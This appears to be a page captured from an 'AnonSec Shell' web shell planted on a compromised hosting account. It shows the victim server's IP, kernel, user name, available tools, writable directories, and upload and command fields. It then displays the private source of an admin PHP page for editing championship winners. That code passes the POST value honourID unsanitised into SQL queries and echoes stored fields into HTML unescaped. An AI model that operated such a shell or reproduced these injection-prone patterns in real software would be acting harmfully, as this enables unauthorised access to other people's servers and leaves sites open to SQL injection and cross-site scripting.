AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/atfycaf/www/admin/honoursEdit.php
<?php
$thisCheckID	= 17;
include "globalVars.php";

include "header.php";
?>

				<h2>Update a Championship Winner</h2>

<?php
if (isset($_POST["updateWinner"])) {
	$honourID	= $_POST["honourID"];

	$groupType		= cleanPost($_POST["groupType"], $conn);
	$honourYear		= cleanPost($_POST["honourYear"], $conn);
	$honourLocation	= cleanPost($_POST["honourLocation"], $conn);
	$honourWinner	= cleanPost($_POST["honourWinner"], $conn);

	mysqli_query($conn, "UPDATE honours SET groupType = '$groupType', honourYear = '$honourYear', honourLocation = '". addslashes($honourLocation) ."', honourWinner = '". addslashes($honourWinner) ."' WHERE id = '$honourID'") or die (mysqli_error($conn));

	$groupQuery = mysqli_query($conn, "SELECT groupTitle FROM honoursGroups WHERE id = '$groupType'");
	while ($gQ = mysqli_fetch_array($groupQuery)) {
		$groupTitle		= $gQ["groupTitle"];
	}

	$trackDate		= date("Y-m-d H:i:s");
	mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/honoursEdit.html', 'leagueConfig', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; updated the ". addslashes($groupTitle) ." Winner ". addslashes($honourWinner) ." for $honourYear')");


	echo "<p><strong>Success!</strong> The Championship Winner $honourWinner for $honourYear has been updated.</p>";

} elseif (isset($_POST["getWinner"])) {
	$honourID	= $_POST["honourID"];

	$honourQuery = mysqli_query($conn, "SELECT * FROM honours WHERE id = '$honourID'");
	while ($hQ = mysqli_fetch_array($honourQuery)) {
		$honourGroup	= $hQ["groupType"];
		$honourYear		= $hQ["honourYear"];
		$honourLocation	= $hQ["honourLocation"];
		$honourWinner	= $hQ["honourWinner"];
	}
	?>
	<a class="pagesBack" href="honoursEdit.html">Back to Honours List</a>
    <form action="honoursEdit.html" method="post" style="float:left; clear:both;">
		<input type="hidden" name="honourID" value="<?php echo $honourID ?>">
		<div class="descStTab">
			<div class="pFormRow">
				<div class="pFormTitle">Tournament Group:</div>
				<div class="pFormSelect">
					<select name="groupType">
					<?php
					$groupQuery = mysqli_query($conn, "SELECT * FROM honoursGroups ORDER BY id ASC");
					while ($gQ = mysqli_fetch_array($groupQuery)) {
						$groupID	= $gQ["id"];
						$groupName	= $gQ["groupTitle"];
						?>
						<option value="<?php echo $groupID ?>"<?php if ($groupID == $honourGroup) {?> selected<?php } ?>><?php echo $groupName ?></option>
						<?php
					}
					?>
					</select>
					<div class="pFormLabel">
						<label class="labelName">Tournament Group:</label>
					</div>
				</div>
			</div>
			<div class="pFormRow">
				<div class="pFormTitle">Tournament Year:</div>
				<div class="pFormSelect">
					<select name="honourYear">
					<?php
					for ($year = date("Y"); $year >= 2000; $year -= 1) {
						?>
						<option value="<?php echo $year ?>"<?php if ($year == $honourYear) {?> selected<?php } ?>><?php echo $year ?></option>
						<?php
					}
					?>
					</select>
					<div class="pFormLabel">
						<label class="labelName">Tournament Year:</label>
					</div>
				</div>
			</div>
			<div class="pFormRow">
				<div class="pFormTitle">Tournament Location:</div>
				<div class="pFormInput">
					<input type="text" name="honourLocation" size="50" value="<?php echo $honourLocation ?>" />
					<div class="pFormLabel">
						<label class="labelName">Tournament Location:</label>
					</div>
				</div>
			</div>
			<div class="pFormRow">
				<div class="pFormTitle">Winner Name:</div>
				<div class="pFormInput">
					<input type="text" name="honourWinner" size="50" value="<?php echo $honourWinner ?>" />
					<div class="pFormLabel">
						<label class="labelName">Winner Name:</label>
					</div>
				</div>
			</div>
		</div>
		<input type="submit" class="submitButton" name="updateWinner" value="Update Winner" />
	</form>
	<?php
} else {
	?>
	<div id="aGroupSearch">
		<div class="aGroupTitle">Show:</div>
		<div class="aGroupSelect">
			<select id="showHonoursGroup">
				<option value="0">Show All</option>
			<?php
			$honoursGroupsQuery = mysqli_query($conn, "SELECT * FROM honoursGroups ORDER BY id ASC") or die (mysqli_error($conn));
			while ($hGQ = mysqli_fetch_array($honoursGroupsQuery)) {
				$groupID		= $hGQ["id"];
				$groupName		= $hGQ["groupTitle"];
				?>
				<option value="<?php echo $groupID ?>">Show only <?php echo $groupName ?></option>
				<?php
			}
			?>
			</select>
		</div>
	</div>
	<?php
	$honoursGroupsQuery = mysqli_query($conn, "SELECT * FROM honoursGroups ORDER BY id ASC") or die (mysqli_error($conn));
	while ($hGQ = mysqli_fetch_array($honoursGroupsQuery)) {
		$groupID		= $hGQ["id"];
		$groupName		= $hGQ["groupTitle"];
		?>
	<div id="honours<?php echo $groupID ?>" class="descStTab" style="margin-bottom:30px;">
		<h3><?php echo $groupName ?></h3>
		<?php
		$honoursQuery = mysqli_query($conn, "SELECT * FROM honours WHERE groupType = '$groupID' ORDER BY honourYear DESC");
		while ($hQ = mysqli_fetch_array($honoursQuery)) {
			$honourID		= $hQ["id"];
			$honourYear		= $hQ["honourYear"];
			$honourLocation	= $hQ["honourLocation"];
			$honourWinner	= $hQ["honourWinner"];
			?>
		<div class="pFormRow">
			<div class="pFormEditTitle">
				<?php echo $honourWinner ?><br><br>
				<?php echo "$honourLocation $honourYear" ?>
			</div>
			<div class="pFormEditButtons">
				<form action="honoursEdit.html" method="post"><input type="hidden" name="honourID" value="<?php echo $honourID ?>" /><input type="submit" class="submitButton" name="getWinner" value="Edit"></form><br />
				<form action="honoursDel.html" method="post"><input type="hidden" name="honourID" value="<?php echo $honourID ?>" /><input type="submit" class="deleteButton" name="getWinner" value="Delete"></form>
			</div>
		</div>
			<?php
		}
		?>
	</div>
		<?php
	}
}
?>



<?php
include "footer.php";
?>

Anon7 - 2022
AnonSec Team